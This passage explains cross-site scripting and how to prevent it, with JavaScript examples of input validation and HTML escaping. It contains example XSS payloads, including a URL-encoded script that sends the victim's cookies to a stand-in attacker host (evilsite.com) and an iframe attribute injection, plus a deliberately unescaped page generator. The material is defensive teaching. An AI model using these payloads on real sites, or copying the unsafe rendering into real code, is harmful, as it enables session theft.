But what happens if someone can get you to click on a link to http://www.example.com/mycgi?username=Fred<script>alert('Uh oh');</script>? The CGI might write the following HTML into the resulting page:
Hello, <b>Fred<script>alert('Uh oh');</script></b>
Displaying an alert is harmless, but consider a more malicious link:
http://www.example.com/mycgi?username=Fritz%3Cscript%3E%0A%28new%20Image%29.src%3D%27http%3A//www.evilsite.com/%3Fstolencookie%3D%27+escape%28document.cookie%29%3B%0A%3C/script%3E
First, note that potentially problematic characters such as <, :, and ? have been URL encoded so as not to confuse the browser. Now consider the resulting HTML that would be written into the page:
Hello, <b>Fritz <script> (new Image).src='http://www.evilsite.com/?stolencookie='+ escape(document.cookie); </script></b>
This script causes the browser to try to load an image from www.evilsite.com, and includes in the URL any cookies the user has for the current site (www.example.com). The fact that this image doesn’t exist is not important; the user won’t see it anyway. What is important is to notice that the attacker presumably runs www.evilsite.com, and now only has to look through his logs in order to find cookies that have been stolen from unsuspecting users. Since most sites store login information in cookies, this could potentially let the attacker log in with his victims’ identities.
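To see how the encoded link turns into the markup shown above, here is a minimal sketch of a page generator that makes the same mistake. The function name renderGreetingUnsafe is hypothetical and stands in for the CGI; the sketch assumes the server percent-decodes the parameter and concatenates it into the page with no escaping.

```javascript
// Hypothetical stand-in for the vulnerable CGI: it decodes the username
// parameter and writes it into the page without escaping anything.
function renderGreetingUnsafe(rawQueryValue) {
  // decodeURIComponent reverses the %XX encoding used in the malicious link.
  // It leaves "+" untouched; many form decoders would turn "+" into a space.
  const username = decodeURIComponent(rawQueryValue);
  return "Hello, <b>" + username + "</b>";
}

// The username value from the malicious link, split only for readability.
const encoded =
  "Fritz%3Cscript%3E%0A%28new%20Image%29.src%3D" +
  "%27http%3A//www.evilsite.com/%3Fstolencookie%3D%27+escape%28document.cookie%29%3B" +
  "%0A%3C/script%3E";

const page = renderGreetingUnsafe(encoded);
console.log(page); // the output contains a live <script> element
```

Because the decoded value is treated as markup rather than as text, the browser has no way to distinguish the injected script from one the site intended to serve.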
Cross-site scripting attacks aren’t limited to stealing cookies. Anything undesirable that is prevented by the same origin policy could happen. For example, the script could just as easily have snooped on the user’s keypresses and sent them to www.evilsite.com. The same origin policy doesn’t apply here: the browser has no way of knowing that www.example.com didn’t intend for the script to appear in the page.
You should use a two-pronged approach to preventing cross-site scripting attacks. The first approach is to always positively validate user input at the server (i.e., in your CGI, PHP, and so on). You should check submitted form values against regular expressions that are known to be “good” (or use equivalent logic to make the determination). This contrasts with checking values for undesirable characters, which we term “negative” validation. For example, if usernames are supposed to be alphanumeric, ensure that inputs match a regular expression such as ^[a-zA-Z0-9]+$ instead of looking for potentially problematic non-alphanumeric characters. Positive matching is superior to negative matching because there’s no opportunity to make a mistake by forgetting to search for a particular “bad” character.
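Positive validation of the username can be sketched as follows. The regular expression is the one given in the text; the helper name isValidUsername is an assumption made for illustration, and a real site would run this check on the server before using the value.

```javascript
// Allow-list pattern from the text: one or more ASCII letters or digits,
// anchored at both ends so the whole value must match.
const USERNAME_PATTERN = /^[a-zA-Z0-9]+$/;

// Hypothetical helper: returns true only for values that match the allow-list.
function isValidUsername(input) {
  return typeof input === "string" && USERNAME_PATTERN.test(input);
}

console.log(isValidUsername("Fred"));                                  // true
console.log(isValidUsername("Fred<script>alert('Uh oh');</script>")); // false
console.log(isValidUsername(""));                                      // false
```

Anything that fails the check is rejected outright, so there is no list of "bad" characters to keep up to date.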
The second approach is to always HTML-escape data before writing it into a Web page. HTML-escaping replaces meaningful HTML characters such as < and > with their entity equivalents, in this case &lt; and &gt;. Doing so ensures that even if malicious input makes it past your input validation code, it will be rendered harmless when written into the page.
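A minimal sketch of HTML-escaping applied to the earlier greeting might look like this. The function names escapeHtml and renderGreeting are hypothetical. The ampersand is escaped as well, and first, so that the entities produced for < and > are not themselves altered.

```javascript
// Hypothetical helper: replaces &, <, and > with their entity equivalents.
// "&" must be handled first, or the "&" in "&lt;" would be escaped again.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical page generator that escapes the value before writing it out.
function renderGreeting(username) {
  return "Hello, <b>" + escapeHtml(username) + "</b>";
}

console.log(renderGreeting("Fred<script>alert('Uh oh');</script>"));
// Hello, <b>Fred&lt;script&gt;alert('Uh oh');&lt;/script&gt;</b>
```

The browser now displays the script text literally instead of executing it.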
Note that the escaping needed to make data safe for output (termed output sanitization) depends on where it is written into the page. For example, suppose the user passes in a URL to be written into an <iframe>:
<iframe src="VALUEGOESHERE"> </iframe>
An attacker could pass in http://somelegitsite.com"%20onload="evilJSFunction() as the URL (%20 is a space; the closing quote is supplied by the page itself). This would be decoded and inserted into the page, resulting in:
<iframe src="http://somelegitsite.com" onload="evilJSFunction()"> </iframe>
Merely escaping < and > is not sufficient; you need to be aware of the context of output as well. A policy of escaping &, <, >, and parentheses, as well as single and double quotes, is often the best way to go.
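The broader escaping policy can be sketched as below, applied to the iframe example. The names ENTITY_MAP and escapeForHtml are assumptions, and the numeric entities chosen for quotes and parentheses are one reasonable encoding, not the only one. A single replacement pass is used so that no character is escaped twice.

```javascript
// Entity equivalents for every character named in the policy.
const ENTITY_MAP = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
  "(": "&#40;",
  ")": "&#41;",
};

// Hypothetical helper: escapes all policy characters in one pass.
function escapeForHtml(text) {
  return String(text).replace(/[&<>"'()]/g, (ch) => ENTITY_MAP[ch]);
}

// The attacker's value after URL decoding.
const attackerUrl = 'http://somelegitsite.com" onload="evilJSFunction()';
const markup = '<iframe src="' + escapeForHtml(attackerUrl) + '"> </iframe>';
console.log(markup);
// <iframe src="http://somelegitsite.com&quot; onload=&quot;evilJSFunction&#40;&#41;"> </iframe>
```

With the quotes escaped, the attacker's text can no longer close the src attribute, so the onload handler is never created; the whole value is simply treated as an odd-looking URL.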